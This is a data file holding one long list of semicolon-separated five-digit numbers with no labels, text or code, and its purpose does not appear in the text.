34309;39792;19670;14569;56779;25131;51561;20609;40921;25266;29615;63994;58162;10204;53864;14546;22930;60854;25068;23322;16312;19085;44745;50674;44799;24139;12202;36772;18138;52867;55000;62536;16658;38123;34019;55904;40427;44045;38321;24327;62205;20432;23952;38236;21636;28106;36662;43573;55879;43474;51875;11729;13663;42859;56810;65485;47696;31561;47282;45832;53105;13247;56184;57113;11739;58678;27884;29860;51053;57103;46951;15171;14227;17165;20428;52632;41600;15266;16025;46105;51858;46237;39113;16893;22762;40250;51698;33691;42641;33700;54546;21258;58145;16638;63985;22868;49610;56746;52661;48874;51900;47041;24200;21571;66365;11943;20180;14171;10154;47806;62875;22482;45201;50431;30320;66411;28749;16299;22434;57250;51598;37120;45164;34660;29451;29617;49560;41594;59710;24867;48889;41944;43520;15774;54143;47460;49908;39636;49216;19225;49646;64778;42547;21541;57938;61559;18062;26524;38588;11272;21078;62583;60028;31067;37086;51363;15225;28696;20845;66903;16810;21701;66938;13008;15401;26081;51606;37106;37750;41013;20616;45996;53256;53194;24486;19214;10917;15378;54564;40520;27011;38990;19278;44149;55221;49975;43197;34147;32120;53066;33034;20189;61512;47009;55122;48195;51146;28485;24597;59787;24508;36760;20284;49322;40251;14441;25657;50355;30048;17716;59389;16967;36481;43373;60386;29491;38942;39491;37062;34111;54514;59702;12239;59574;20381;30751;24278;21000;41693;11941;54910;30073;28949;37389;40461;14315;10662;24806;14421;41100;26083;60317;22418;18129;32960;54316;45293;33282;63888;49382;25608;33820;12631;39693;59652;60850;46413;14781;60396;39705;17727;17426;64519;50675;10806;61239;20993;52205;42101;41218;16156;17053;25173;57840;51387;47451;11412;52770;10142;13207;37128;61996;27465;39296;49170;37769;29553;62985;38125;53435;53953;39482;29555;10005;15457;53021;33578;37474;20817;41795;20895;14788;19279;38643;47254;11370;18105;17676;14416;21002;39355;33000;30892;28206;50090;20345;22594;66573;53826;42459;19081;64084;63498;22829;39738;24054;37622;64018;31870;51369;10177;24577;14932;58389;45216;20406;65644;17277;25542;45615;31043;60619;15574;40887;22928;55048;10056;12252;36575;55774;52443;16894;40435;57020;25647;18618;25867;48891;18568;23509;32432;64128;40938;40964;36774;41656;54189;46755;34555;30819;14901;35624;31690;24442;39508;31017;66747;44910;24860;66726;26286;50212;34673;31837;53986;62223;12651;62597;11578;59925;28355;29359;17337;36753;42317;40747;22475;31811;49125;12217;57435;45150;50413;23691;29318;30543;64980;30717;54490;14590;56258;32092;35005;27058;63682;44878;34414;24479;19538;48351;20875;41702;20745;21460;53349;18604;63413;32031;31095;18493;33276;25231;13575;59411;13254;27641;24185;10728;42031;10509;15840;51593;39822;62915;43163;13600;52919;43765;62348;33759;62572;47784;35547;46362;12460;18058;59077;39266;65377;36671;53590;23588;36876;42538;28111;34519;15385;12791;49555;36275;10919;61384;37468;43972;37561;21368;38075;46049;65350;35176;45488;21860;45110;50531;58464;58041;53828;63141;37472;63036;60172;17071;41114;14931;59747;28638;54145;41520;44769;56847;31608;55045;20762;35022;41923;11245;14860;32854;19321;32687;42111;11443;39582;33385;38237;41105;65107;22860;64140;27061;42214;32717;53184;61441;23506;64376;33983;61050;19433;49821;24782;51774;21050;30977;50529;43066;35416;43307;65437;60770;49557;21178;62951;22336;53819;20653;45475;32808;30205;26929;39087;57575;25795;43669;50136;50635;29169;56044;64935;51248;63439;35292;65819;19276;33227;33468;55659;22413;50564;49335;56225;50940;11835;17312;44596;45350;50824;27851;27615;42051;60260;52980;13754;45371;49535;37287;50372;66798;65098;52118;46809;40916;61022;59507;10487;19584;42068;62333;39780;63440;47277;49386;16800;42439;19562;42422;40569;38296;58709;19101;33964;27934;50182;18477;31952;36996;61138;38756;44398;26914;44535;22302;22028;65355;33100;63222;43799;65393;33932;50485;28260;46277;18173;66809;47534;39752;60939;33256;13128;37404;42722;27748;23869;28637;35269;20006;19946;50710;36634;55495;19375;34331;34221;49683;23298;38821;57541;62192;55753;63185;61706;53618;59164;15021;22516;39253;60321;33009;44987;13572;11785;38740;22859;24335;57301;51549;13760;13629;58404;45841;34029;38889;11692;63168;44968;46739;18364;29423;31411;36936;42982;35083;52427;23972;27605;49771;57409;18506;21795;47364;55064;57124;21437;30557;63199;49058;63681;56704;13868;25172;49119;36118;62431;46763;27947;38440;60871;22736;50343;17518;28241;21685;64991;30877;65564;26075;64588;31292;27043;46326;51069;11882;28862;27312;55305;52119;39956;25539;32901;17283;37313;20482;16599;63869;18279;52999;58775;58925;31682;61762;47069;55992;51474;52120;19630;30133;29840;44698;63871;47549;11416;55092;30006;48518;19610;64232;17248;27507;65634;32913;36222;65030;53996;66837;47527;12066;43406;54840;48815;59208;66081;58477;23992;25082;36021;44848;60582;27244;38962;62147;46051;21145;51870;43396;17379;44959;15508;25749;41317;11939;28038;64030;22472;32775;32720;20661;60829;20478;65888;48975;20312;55736;47280;27368;21614;49621;14346;66705;16885;14990;40590;17341;16964;20537;63547;28024;52969;29552;22512;62391;29089;34985;11641;43809;19325;30063;28871;11083;51404;27623;38653;12591;47626;56106;13109;40597;28254;65197;62272;47195;13581;66079;57513;28656;51299;33961;30925;57380;49263;24402;52165;37217;14422;38193;56954;21935;17020;15816;61572;25924;44436;37002;17026;14778;18098;16208;65240;24886;49160;62318;62207;38251;11236;63680;41957;17821;54933;23081;16748;13836;27752;26339;26438;21042;33272;49930;11127;19945;35432;29117;54469;14629;44747;13295;16719;64494;51225;34427;17326;63290;38303;33640;38057;26792;33861;45029;11552;60343;24570;41673;51009;22602;23407;17351;23668;27482;65727;54713;30243;10529;29956;41096;40662;36505;20088;19047;10725;51001;55501;32772;53676;29442;10099;53759;52916;10757;52955;13406;45138;59824;18185;38919;31469;51505;55848;41273;19626;38636;37651;44516;25456;28809;40372;61213;18223;13036;34789;14155;33835;25476;59936;33819;55516;28108;21030;62988;65896;43038;18885;37022;44895;45625;38855;60721;26499;22110;26226;11327;10528;45246;22024;32658;24390;62492;21584;22653;45507;49412;46922;15609;48854;57207;56630;60357;30509;60709;17749;10496;64046;66410;53522;60772;29063;23459;28630;48276;28029;31726;64657;18670;24134;18176;53411;48570;61524;55917;66541;52382;25559;43142;34024;27028;22203;46331;63838;33087;51251;44651;39221;36605;26317;41449;43886;22937;43057;29396;20059;28849;17834;47061;50704;14127;45577;40259;59535;25971;11382;52653;44635;59506;38373;21538;50867;58272;15325;51334;29492;20960;48174;45747;48383;47102;11037;46449;53015;21226;13300;42375;11730;23877;35569;21007;24687;34066;27672;31231;56102;55400;38760;55789;60585;48811;13069;55306;44414;50853;55834;50950;17637;18421;53716;23325;65973;52191;48640;38050;16374;59123;41433;14379;46226;55859;17057;32179;62678;62279;58133;35156;35739;30910;25862;16620;17989;56086;39684;52356;23620;41384;10492;46561;36896;28527;34621;46839;31446;63114;17336;33978;63696;57393;40414;18442;22374;50265;30849;58937;21870;42833;26678;51226;34273;31366;40105;19559;59469;34363;38477;29915;10268;36362;21771;40188;19387;41442;52809;12235;40209;59134;62246;23204;61370;42494;54698;43086;29789;49710;15898;61995;54592;12444;23285;42106;64668;50098;23201;38968;44479;49130;40254;21858;44875;10392;43716;65781;44423;65190;44123;51124;35367;20316;60319;11021;65138;55640;49954;46005;29071;55322;16313;46205;51710;32981;19355;59850;60117;30972;29444;54926;59723;39015;25312;19490;54058;61158;64926;10673;63004;43687;33319;23625;42677;37753;61864;60737;36932;50884;19774;27393;23855;27432;36660;16221;22558;66921;37251;34773;57328;47119;40280;52219;42449;12287;58575;45074;12839;13814;38804;31773;12015;28424;39590;27145;58702;13537;58462;53240;14786;42138;51323;63894;15748;62968;32164;49071;17713;65573;63643;22528;56009;38506;61118;31617;24616;45768;24511;37845;66813;38412;27716;28151;56567;64799;29855;41945;44181;62309;23453;30547;62773;22174;18332;59957;43425;31792;60603;52133;22525;18991;63446;66647;63980;11702;58679;32697;57723;55095;54790;36982;18346;39996;66928;64660;44048;26735;59891;34239;40592;13311;56932;22289;53286;59428;26324;36805;13862;35895;34142;46860;46585;63381;42299;23786;54723;31471;20113;23449;38220;36695;42984;25656;18483;37281;20569;61528;11066;52960;58568;10911;11337;10573;60670;55587;53683;44505;25025;34872;12928;30072;25146;28962;51352;57659;46386;41339;14713;16827;37978;39575;53026;16098;49580;55024;34344;55885;65226;55726;34917;24761;61258;52891;17671;64723;59049;63861;32295;59792;26343;27278;52907;64774;25985;54495;54260;33335;65555;17085;46321;38478;42297;37500;53927;47407;12111;24559;52829;59736;49945;66574;16501;30991;33442;49566;61376;13227;66556;43701;24676;17599;57144;15970;56168;21280;59910;53622;14897;18823;49759;38446;36319;14596;32784;28896;14511;48237;36920;15699;13090;18348;60614;44614;19356;13726;45516;13696;15222;52441;56984;25406;12232;60570;35900;21392;45595;41987;20130;34192;39787;14332;55626;49110;23624;40830;52492;26345;13464;21054;26501;26084;19654;16923;46109;36761;26687;62762;25609;29109;61372;16315;37636;28225;57487;18226;13997;34669;31706;19074;52790;28025;63969;58209;56568;57021;50794;42558;15444;29187;54812;63495;28671;64096;27908;64653;15734;58698;16220;14551;34233;21328;49729;60200;31181;38535;14720;50006;35002;53884;43232;55399;22023;35199;64781;62519;61318;30126;55527;53386;28286;13268;35138;59822;42263;44522;37730;14974;27973;21248;49779;37366;27549;19597;36288;42785;27398;43394;43736;47638;28384;42113;59006;26012;51538;39119;33168;58616;24455;53124;36196;60064;17077;14658;37656;53236;27987;50690;60171;65825;16484;14670;46519;44454;17791;17445;55285;61127;57143;21214;12906;15780;56723;24491;40311;26974;43881;33450;14787;12804;27256;32593;61977;65544;14399;18993;34347;22391;51955;23395;50707;58540;31423;23621;50049;16291;56535;45604;59203;50919;43906;36594;26070;11290;61037;41515;61733;48647;44313;36612;64941;61989;30725;13049;35537;25235;24636;40977;32859;47846;13753;15878;15196;37503;60855;30018;17171;47270;59027;11026;46430;41841;26444;47378;60484;56493;64342;15109;34367;14733;56754;26938;11985;44750;52739;61747;40129;47386;51321;30897;14013;53474;26021;38161;10970;56239;27533;38798;54387;14303;33571;12921;33587;12503;23784;16443;44427;57549;43145;61310;23097;57175;55208;26448;30417;44018;59534;43872;51202;60618;26465;24685;33584;11714;46667;50643;20831;47111;51975;14337;32591;46358;36527;10947;22782;33384;15095;52180;34851;66126;54203;34149;25160;60383;58842;26138;60044;52944;39820;51925;12736;44553;20387;13427;24057;41470;32966;37377;52954;56649;15676;66950;59041;41281;59047;60336;38995;48287;61423;45817;29854;15621;14985;28989;52808;21052;62399;24602;14092;36347;50631;36673;38194;49833;35888;19154;61013;62289;46576;21831;29435;46659;40391;12536;58040;61701;28408;66255;39601;13071;32185;38309;46384;49390;24114;61869;48773;53955;62316;66119;40239;35572;24917;63349;19846;33715;15268;64544;47028;30968;65664;32235;44071;45162;41880;14342;16655;44037;29285;47066;44625;47298;59338;24992;47668;17717;38580;10666;65401;25418;55403;43522;14795;26449;48689;18690;28081;25948;45363;55733;46152;20900;32692;15688;17174;36035;65351;20304;28471;25250;42082;35306;46666;40332;34572;11474;50411;26953;33678;49982;28838;26643;35550;50544;45795;10913;26017;33375;63543;43723;31780;27349;51717;28587;41759;62805;35686;64298;42267;21937;41498;18983;57878;65289;47136;31538;33699;64712;43051;21574;13692;11757;29834;44573;14184;53778;42541;13282;42094;42652;43751;23652;15899;31527;36504;51485;53727;43102;38382;30312;18852;48742;15389;36601;40235;49304;27686;51186;18895;16349;35602;41185;12673;46909;13253;22485;45906;53707;32985;35026;36345;13333;48940;28655;40737;16297;23528;37362;18657;65567;65261;20149;45517;40252;12584;64764;48916;56005;42857;62619;26373;39620;34310;58880;22012;24938;65200;53515;66361;65911;57685;64828;62506;58072;37485;55077;61874;16248;17710;29632;59923;65196;60467;14604;60385;64056;22456;43471;39027;35800;55175;24255;47063;38593;54551;61148;28978;24222;66299;15541;12399;32910;47441;44998;33170;13750;47728;32197;52578;35652;35581;28026;51235;51074;25877;60842;43829;46559;62792;43753;22963;64596;18443;19764;18229;37416;38758;30142;62146;57504;50907;14187;51528;35552;47258;36623;45305;34421;32339;65071;66226;10859;23963;46878;56002;33501;47861;49532;29971;55664;29065;15597;23198;20580;32399;21379;23555;36135;40302;41631;15102;38763;28118;35324;61764;56219;22721;41090;13719;25908;54041;29043;13446;60863;26162;59201;43794;56415;26656;24904;15677;66851;63493;30573;47095;39250;53315;32038;50823;14809;27122;26022;54335;39189;39182;38534;33879;59245;44729;31155;34771;38547;66391;26150;63828;15620;50259;35679;20871;61556;64184;26201;62836;60371;59372;57552;19689;52166;58521;18160;34460;33064;38574;66611;62764;51542;44183;29110;47794;28539;13704;20626;28334;64301;38748;47689;10670;19453;21011;56133;41328;37760;28074;50759;63927;58874;14174;65939;46558;37092;13033;37535;22998;51075;38916;27270;43260;45281;15674;16509;54940;26798;57075;12439;60098;12471;19875;47715;32978;44452;44114;27474;33542;55178;57656;20805;65447;45638;35633;17272;55902;29008;45463;50123;58665;53502;27492;42411;25750;30095;55402;41828;51930;35722;17376;11649;28430;58608;51289;59728;36010;38449;23941;33885;39100;56937;22784;34164;47359;18512;17504;49270;16200;56419;66827;33742;15506;22807;17625;10273;27501;15794;31661;33803;45789;43267;44272;60209;47297;51388;11063;14052;48721;32690;23320;37397;19409;52991;11658;50314;46220;45180;27829;43333;66242;49220;52712;34710;42260;66349;14076;45169;48505;38575;18978;54503;62368;26440;54064;34064;61888;24275;48950;33077;55380;59785;16765;29001;28548;52733;46917;35454;53231;41094;25137;17689;20819;10296;15138;33539;38829;64851;18389;58030;45426;29532;62035;48683;55811;64389;55415;54421;43578;61577;51375;12120;51458;52283;51778;20300;42117;44956;31102;52573;23244;22267;41812;26862;66635;61253;13633;21001;21842;13617;30762;38551;51221;33506;59071;50227;49225;36397;27966;30636;38632;60264;27077;60097;11054;56361;21905;15921;19937;49228;30974;23059;49326;38199;26208;18518;38903;13953;66940;15418;11131;45551;31192;25627;43914;38337;35253;11469;46438;26709;18951;42977;56873;11758;33832;44434;54036;29913;28145;24348;57110;39023;36140;18497;46317;22078;56578;20843;13847;60873;36552;39891;64755;20689;11828;29596;56051;60170;38838;21274;31104;54513;54720;48814;16464;12458;27097;50518;21022;42615;60864;46235;35428;57961;24425;34956;56097;52680;24313;62470;63066;11396;43490;55330;21362;49343;22502;44301;53603;57480;33138;34056;62338;37333;33299;32536;56132;55662;49611;23005;44320;39006;26175;12977;38729;24874;32948;38379;48862;41525;12118;41888;24277;40054;52677;10491;65752;15858;48229;25800;37407;56397;12979;12457;34044;48216;45099;53538;33946;42742;37703;37932;31243;47248;65699;40212;13913;18772;56247;26992;29272;29329;28411;60410;57429;20602;53783;48461;26124;42739;59772;60512;63964;43417;14153;18532;14406;10555;24593;59547;14998;39517;49725;55190;23580;61119;46293;37504;64181;31037;54909;39472;18283;39455;47447;24252;43181;27812;21175;28463;31158;55110;60122;36003;53838;33165;39703;40482;63667;10019;64748;27135;57106;58514;60137;60299;30315;64692;25419;10923;58939;51452;18121;45739;36457;25344;12820;40298;45388;43652;37619;63415;66451;42080;58723;19163;26205;60568;55901;21510;63204;59025;38941;64994;21302;39618;54209;26893;16240;47050;63819;36281;36270;55680;32739;51802;20864;31230;21140;39001;23188;47439;32503;19824;11984;40849;60096;47272;47847;60287;31035;21555;49698;46745;35927;53559;54993;47584;57013;29167;38569;26919;63979;20257;44374;11779;27161;26469;16709;30576;48920;65853;30324;45134;22326;62345;20120;40194;52295;43713;58544;32618;34898;26811;52422;50432;22870;21727;37020;21032;26609;10860;54157;45847;21522;63092;26274;45330;32002;19273;19146;44571;47222;25296;46267;32590;54768;19410;42910;26848;24070;33927;36553;28782;12807;13976;18684;57039;42965;65702;41293;62306;30959;60080;59090;39988;48167;19460;32596;40939;30141;58783;40810;46357;12246;13032;16980;14085;29837;27723;35272;44778;10526;16624;55227;63538;41815;26778;12620;23348;43819;58347;38831;38710;65993;41680;30527;53880;55355;58265;18333;11588;31641;40911;66707;50568;53519;66920;28370;35364;22923;66603;41752;21365;18831;61521;12427;11506;14906;52865;46404;60263;60014;11518;27677;40257;32684;15427;31679;32492;32527;15417;39325;21966;61058;21154;55730;10833;61731;26335;31545;33871;48731;10119;10377;11667;39908;60786;45890;60397;52051;58200;66001;50308;10763;61330;14032;35396;47538;46002;49589;37521;49151;37668;15874;64458;61432;61527;30368;20914;52459;36216;63116;57606;62871;52262;40301;64020;47850;43172;57729;41696;64950;32116;66975;32849;37653;25011;53645;24254;45684;55710;43321;28819;51338;40050;50770;52272;51242;23950;53216;19255;18366;66558;51301;57036;49334;59148;26647;18205;42415;19618;23301;54013;54750;39441;63025;20785;38462;38628;51819;34308;60253;17670;65397;16377;22962;11395;11666;46028;37884;22691;49015;27137;37374;12690;46374;42125;29303;17300;29965;30294;53722;53752;20994;13091;38871;23923;39279;37569;13583;44806;49857;30495;36828;42947;13857;20504;56463;51518;66570;37903;51038;19260;56658;35289;26237;56963;41692;19891;46823;55074;22034;19785;41753;14444;56681;13579;16264;66774;47462;44238;13593;35806;53689;48225;61958;22769;39783;18961;42230;51903;66820;55909;15537;22803;41461;52506;41890;57176;52981;40092;47488;10450;49414;16821;25710;41993;31800;32332;34965;44338;52224;40788;24569;32738;40572;19790;34868;24686;66138;28506;64782;48551;41784;26490;46389;38849;40012;31295;54429;17587;15907;37447;18362;13689;43722;42110;49632;54271;58159;43666;12300;12858;42716;25791;61919;64254;35610;63249;13892;56150;32317;31863;33647;15112;53787;34353;44709;61178;63153;24007;35033;60297;38645;14063;37705;43159;39981;43166;47262;66357;18821;56206;58077;60657;36263;24627;62580;13278;17014;17789;57177;14073;54102;13747;39110;13447;46289;23700;58354;56670;24015;35455;46751;64208;61131;29591;40004;53019;21864;33136;20952;42860;46639;14158;24869;52626;30783;21082;17225;14363;48173;35388;21401;43454;28476;65183;47178;32873;20818;27803;54448;50061;16480;13016;25377;30253;51576;65055;38541;40237;66776;27295;42399;44765;60866;21855;37580;19148;29085;60013;19167;32976;46758;24954;63175;45105;42186;14374;52766;24967;40878;38074;56925;47624;36439;40462;39481;44513;59045;54742;12901;63923;45576;48516;10730;63773;50368;42518;56859;52408;18997;37097;27346;30800;18217;11440;20872;15554;56928;26683;31042;28406;17152;12864;44980;64768;41133;49961;29966;50042;29384;32013;14823;55248;21205;58071;22631;66339;33596;48601;29301;21834;51707;52953;22650;40631;46216;16909;16963;40655;30199;30390;43880;46164;43556;55636;51325;63876;46101;12338;45803;54879;49156;50753;40431;39444;53581;16329;49369;13379;27958;24304;56187;65480;11478;50730;11088;63856;65435;64529;27876;54033;25360;46330;35912;40725;39055;34561;45864;62538;17773;30035;44346;34974;35505;42676;65442;29430;21269;52245;54110;64402;36143;35139;54494;32568;42016;44126;13560;44817;50083;48246;11418;39778;35908;24422;15976;48953;36318;40369;17038;20210;58748;42550;48460;25398;30609;28499;37533;27595;60529;41069;24291;46465;37133;39071;15760;64882;37881;56893;20680;53638;37345;32517;32040;25341;64393;34944;59493;34148;52236;56944;25855;21904;45335;44160;55663;18507;38081;55044;24908;56609;35319;56448;29975;14278;39235;27956;64493;55315;47821;40873;10800;47588;50561;59135;17486;62748;15540;17294;16532;63971;16747;37818;63451;62412;29797;38596;30300;27588;61885;21291;20481;26450;10437;57812;52081;31514;51935;11125;60694;39391;42322;54155;64889;28561;42535;38883;52785;60859;58446;44642;30934;47867;34479;14992;55945;23731;34206;66476;47214;30695;20013;20606;31128;62713;46043;32204;19570;63970;16449;10989;62534;53774;41810;60942;61583;18329;24012;50782;52252;51255;17566;35423;41062;52946;63230;44768;21894;51098;42032;21128;54267;45011;44294;63155;66271;34046;11724;61171;21594;16840;45468;18437;33090;26607;46300;65108;62285;52889;26702;13326;25817;63683;63992;39122;53924;24507;29054;44866;16294;60985;63085;25578;21649;46411;55546;62511;10412;25015;33499;24319;46707;11646;60983;32066;44760;10369;48543;34518;40952;61514;61313;66596;28783;45537;48905;66908;61324;57709;45586;58688;53521;55776;65441;29199;62118;36133;65068;16077;22891;31263;61001;58096;30301;36883;44391;38278;66044;19062;19676;66017;60778;27506;59062;53486;16378;49637;24791;52832;49383;21940;18745;39398;56528;31027;15239;44716;31028;28593;18729;15800;59343;41921;43989;41954;35314;41345;62482;23346;42424;22235;53602;20204;34912;56037;64009;37456;10846;15595;20479;30409;58419;62552;21228;18166;12097;54180;17645;44795;16393;43083;24757;36860;49554;52791;54673;12205;16201;61492;16403;11212;17278;56688;61721;27541;49182;54153;62984;40366;20951;12589;15419;63508;61735;62610;24800;44531;58006;62563;33265;11331;36840;56425;35966;51918;49865;38275;15664;13875;41192;51383;62353;33515;42134;11154;29891;46324;45682;45165;53093;58282;51758;64648;24544;38242;35574;51535;24664;17737;40198;15020;20341;27654;12601;58327;17044;59918;37273;47826;16870;17736;64248;33850;59108;17707;38606;44610;66372;30329;46020;29293;31838;21006;38518;34927;35125;19385;59298;17117;18330;15271;31464;26215;10689;53888;50275;65628;17177;43790;56191;36248;18865;49987;24234;33935;20617;50462;57828;46669;23032;46047;65761;26379;15149;32858;36479;52353;58010;42520;39881;45049;65128;56697;51976;21664;25858;13337;61666;18843;21516;21906;44772;66130;61678;65857;43933;11431;30631;64743;34593;22404;64012;16873;15340;42657;13562;58712;53904;25932;48725;65969;44554;13978;14460;55700;12728;52250;33643;64073;38814;14101;53429;50694;36131;38690;18679;25229;62819;56212;59555;33821;32016;27334;15986;62938;22208;40464;26472;61499;57226;28359;31047;40090;17309;44796;55618;66336;23293;28212;30658;63120;62879;52418;22576;13484;35242;62430;59456;33206;13844;48467;53881;35132;12598;65093;64490;46996;47088;29302;57344;20883;12058;11848;22177;51399;55762;21561;25258;54419;18687;63889;58860;41990;42143;35775;54011;35897;51831;42139;60510;50740;63624;28123;34776;16710;44700;18319;13554;50499;53892;51184;64903;16847;15602;65789;14423;24810;22426;44086;56303;34087;39012;28658;66676;42034;44543;23561;28303;57054;53510;35058;27098;60869;37797;42035;16735;41152;51893;37226;53981;40970;50246;41559;52852;51654;17441;40038;20470;43380;10017;45622;62230;44360;42978;35787;43565;13024;50945;36209;58819;29357;41341;64124;36750;56708;27223;59828;53303;17236;47856;11348;13352;40323;47253;56000;22618;10568;66313;35920;20305;52487;39495;38053;30194;55503;59666;24297;36370;62495;53928;62981;62354;56048;26361;66658;47081;24224;36827;19264;21170;10316;47499;65738;40641;59504;15093;14233;39175;51231;54228;46451;29408;46622;19581;15997;19975;42296;44898;30216;14049;66273;33735;37566;64909;54480;14188;32483;65590;64722;66427;46913;19050;32514;28903;23262;18563;55062;12576;10935;38922;55484;55386;27475;12209;47770;66431;29170;48439;58300;54595;34752;62681;18314;62704;38522;48451;18587;39940;52679;42537;54851;40513;19806;48774;20515;60026;51020;24849;10580;66910;34137;57174;49381;19593;57919;28442;30010;50241;47710;10823;16607;35692;45257;46228;50127;23970;18370;32444;64877;20974;53013;30545;47647;22306;19092;37923;49624;43680;41830;59640;62378;30340;66831;20489;65905;42824;14913;35305;22935;15902;20402;60413;36624;30064;62890;60978;27885;56001;34653;58751;57451;38094;17813;52509;11602;62643;14718;35149;48951;20505;12034;25345;51155;43503;53958;62882;31453;20507;54867;61724;36309;44417;35534;29321;16431;12346;18971;34999;34038;65912;53120;24362;51739;36364;25701;13332;33015;66563;46834;21264;64932;58191;20935;45365;47580;28659;27002;26942;41001;21605;51617;14579;54783;41819;17787;49158;60199;63535;56122;28446;14963;52208;26466;33689;43177;38540;58998;13548;11686;33278;55172;49605;48650;50647;48466;46985;37901;58317;34089;51199;57896;24219;22412;44197;28901;57795;64908;55356;59323;53068;63623;38579;40763;22301;62815;66315;56359;12432;16486;59820;40735;65338;15796;56165;60024;53059;31269;60893;14686;37855;33505;52075;43395;62775;18018;66046;21492;44450;54641;27526;29238;43127;49817;24805;51354;42261;29844;29795;12863;12055;44378;44365;58231;60305;12695;41306;35681;61224;29405;14274;38281;54412;61846;24701;22076;22508;61464;15433;66882;27781;35917;18282;19887;64165;61461;62540;23928;49079;20241;26736;66503;63258;62682;44880;35669;25934;27148;58801;35170;46798;26485;38101;24283;60615;60061;22705;43810;35903;64628;24078;63841;35096;20758;50296;41541;37058;52255;47737;51523;41199;34584;64867;32429;52521;46993;30167;61389;49106;58548;23326;61667;57596;57764;14288;39598;42542;30184;32059;64469;25002;44228;52281;28492;33082;15127;61063;21120;26161;37142;42171;45230;17247;18833;14594;48154;50194;65966;53457;15231;52697;64627;51904;28390;21724;15350;35604;23919;30426;16568;26217;18695;10428;20043;19552;45764;24629;11636;60952;33652;29352;32280;11765;54282;58518;64264;23777;64726;34153;27127;43140;24804;18228;58648;10431;20431;11070;55457;55015;42095;35576;56738;42058;33154;64161;26789;39034;37306;39543;49726;18812;57305;47450;62800;19230;22117;10675;12581;34302;21691;54072;38148;18720;28569;21733;20757;14968;35683;63447;62910;61700;33846;37821;27522;14135;38877;54314;57281;12726;11392;62501;36405;33213;36579;50287;12336;10514;66009;45605;65779;32036;28583;54633;31108;25530;52582;36557;38681;49784;39388;12089;48416;56659;25400;43224;46052;30094;44847;43699;26377;28288;64865;65583;16858;41930;30287;18050;12855;37574;46600;27124;32553;42994;44696;28991;54475;45100;28851;20002;32795;63032;33645;29091;65630;42464;63039;31557;33604;53643;53781;27935;62277;11857;66029;42689;47568;13107;50926;45582;18873;28447;43019;64233;36358;64305;19002;33936;29612;53400;52958;55525;58642;60606;52157;59709;62154;21911;14541;56373;43766;12383;21430;38811;23707;23876;65047;58803;64863;47210;15121;40799;19740;53089;62760;10464;12527;61242;31438;14397;52364;34911;51466;10118;22844;26439;41543;33349;26451;13401;25594;31372;14751;18784;51645;44096;25526;50562;22127;38897;45223;33268;36265;66487;45166;13477;45650;18940;21944;27583;53293;66957;20925;18382;61782;45208;66677;24013;32735;50279;18775;56384;30699;49888;47244;56920;62855;28061;47676;63808;43602;10360;33440;30262;46162;42220;17251;64509;57998;40856;38762;53144;23403;63217;14851;22488;45448;11248;38376;24796;27765;39465;30807;30839;63671;24558;13516;39576;33623;62657;61089;46061;37342;36490;64737;24682;61924;63016;63394;50333;22743;13179;18019;28566;22965;58753;57019;52333;38869;28575;38820;23562;19639;28617;37127;35954;14413;52719;50683;21633;26460;47535;31050;41052;37207;48455;55537;12828;24879;61095;20876;42650;65530;10481;62721;53866;42971;55055;11885;46799;54823;19615;26642;59074;28090;14907;21177;29841;45189;49013;16590;37431;24464;45599;13711;16284;41368;61998;44563;40402;50795;34128;58935;25205;62105;35283;27118;31500;55251;38184;44788;41011;57446;59804;40835;34699;12688;33769;52480;21748;47669;29668;61027;18603;28725;27705;22601;12023;55147;48274;14330;25294;57749;21200;11408;66232;30375;17202;29336;39422;33548;19748;53141;33180;52777;39980;41443;41506;54612;12225;57277;29105;45104;10926;49839;34326;22903;39111;11889;27644;29666;52478;52147;14749;18966;41208;47187;42908;20918;40260;41139;36513;53696;48210;55523;53335;64153;23020;27140;49078;63720;58690;56459;14212;21699;17505;35687;26839;51253;29631;36849;30824;41765;31756;44965;41508;41606;62418;27838;22059;56798;27087;54686;10934;26976;42407;52168;44376;29703;32572;62374;33058;40596;21261;40243;51992;46679;28354;30032;64690;16653;34840;31750;63263;32489;53337;59032;17021;40547;27111;52235;16530;23327;58288;64062;37776;43424;27611;39606;32210;27159;49404;54697;38311;53234;65282;45406;23718;65019;36039;13312;25302;28271;64543;43572;43787;54080;29143;40443;55647;30153;15698;36240;25414;33179;33481;14799;48436;36110;57856;66106;24018;41932;62739;60767;36902;52618;29674;56594;23872;41677;51997;23310;20686;59371;39722;28879;49783;40381;31474;33010;15090;51479;24092;26359;23263;27167;39663;33016;66848;52554;56108;59932;32414;40853;27903;10682;20227;34327;39142;15411;13039;38699;30639;53401;56177;33150;61526;58264;65227;57960;42801;23960;23484;63523;24588;62647;13838;15357;27659;16373;37960;26347;14855;10942;12714;15980;50701;35623;45446;61302;14041;65689;19623;41337;52016;25440;30817;35771;22761;65594;31513;36261;22929;40734;36645;17996;52204;50964;63345;30710;53836;38706;30482;60236;30121;50124;28681;33863;49376;31741;13452;62693;20719;38725;22009;42682;49190;57468;51693;40423;52331;48488;30092;16941;18216;64847;31671;15873;51784;39614;60023;55510;34246;39214;65415;35672;13830;12902;49981;46007;16603;27180;56566;35466;28933;52358;49798;52363;48284;17831;42923;55559;52901;64911;25392;28610;66694;36127;17290;11215;63275;35750;61141;35118;64542;35419;12408;61772;47699;18237;43665;21618;30612;55963;40760;63198;28719;37867;39955;48168;53726;30787;47266;62515;65996;37698;32236;53447;30446;62842;19112;25110;53434;60403;50165;52906;16252;28891;30283;24942;23728;26718;61675;46965;34646;23639;29987;26960;58626;49087;22838;57954;25582;48801;51272;63550;52282;61909;25180;61906;42367;10796;21854;25619;51827;35632;17435;47674;28733;11324;57211;53987;52805;30366;10083;50808;13486;16309;37394;54987;30790;44560;43047;55851;20418;44518;65974;10943;12518;47161;49996;49585;51133;28606;25990;26785;13382;21265;17781;24723;58814;18169;32183;28649;57098;41723;18944;20644;31859;43963;42017;36974;39125;13409;54067;64171;31076;29587;19245;56066;49859;38350;57986;48632;59717;50077;48934;36684;16345;59835;50235;53106;23513;31167;64638;22337;39579;63548;29513;37554;17423;51616;65389;32388;25904;63157;53666;12942;41948;18781;39308;22419;45436;20119;36780;34017;47350;27019;36506;38776;44329;62215;59815;32155;27964;16721;24085;20916;54418;61656;26297;64674;53489;36967;14666;47413;56375;34320;18555;34294;65823;13434;28608;55602;44000;19996;50638;60367;18805;13650;64361;63993;55244;36121;26599;38095;50825;20767;22221;56424;59335;64227;41015;49293;49994;58726;13272;36507;40135;41190;27897;47815;57939;54057;22686;50335;29732;24775;30767;40872;24166;14770;17520;49464;53338;51410;31141;32571;49819;41298;36766;22340;29368;14377;49402;19791;51002;49971;45056;56321;54623;57573;58114;15434;19955;35852;19590;17998;28115;13192;54941;61003;14622;29222;53229;20732;46946;53104;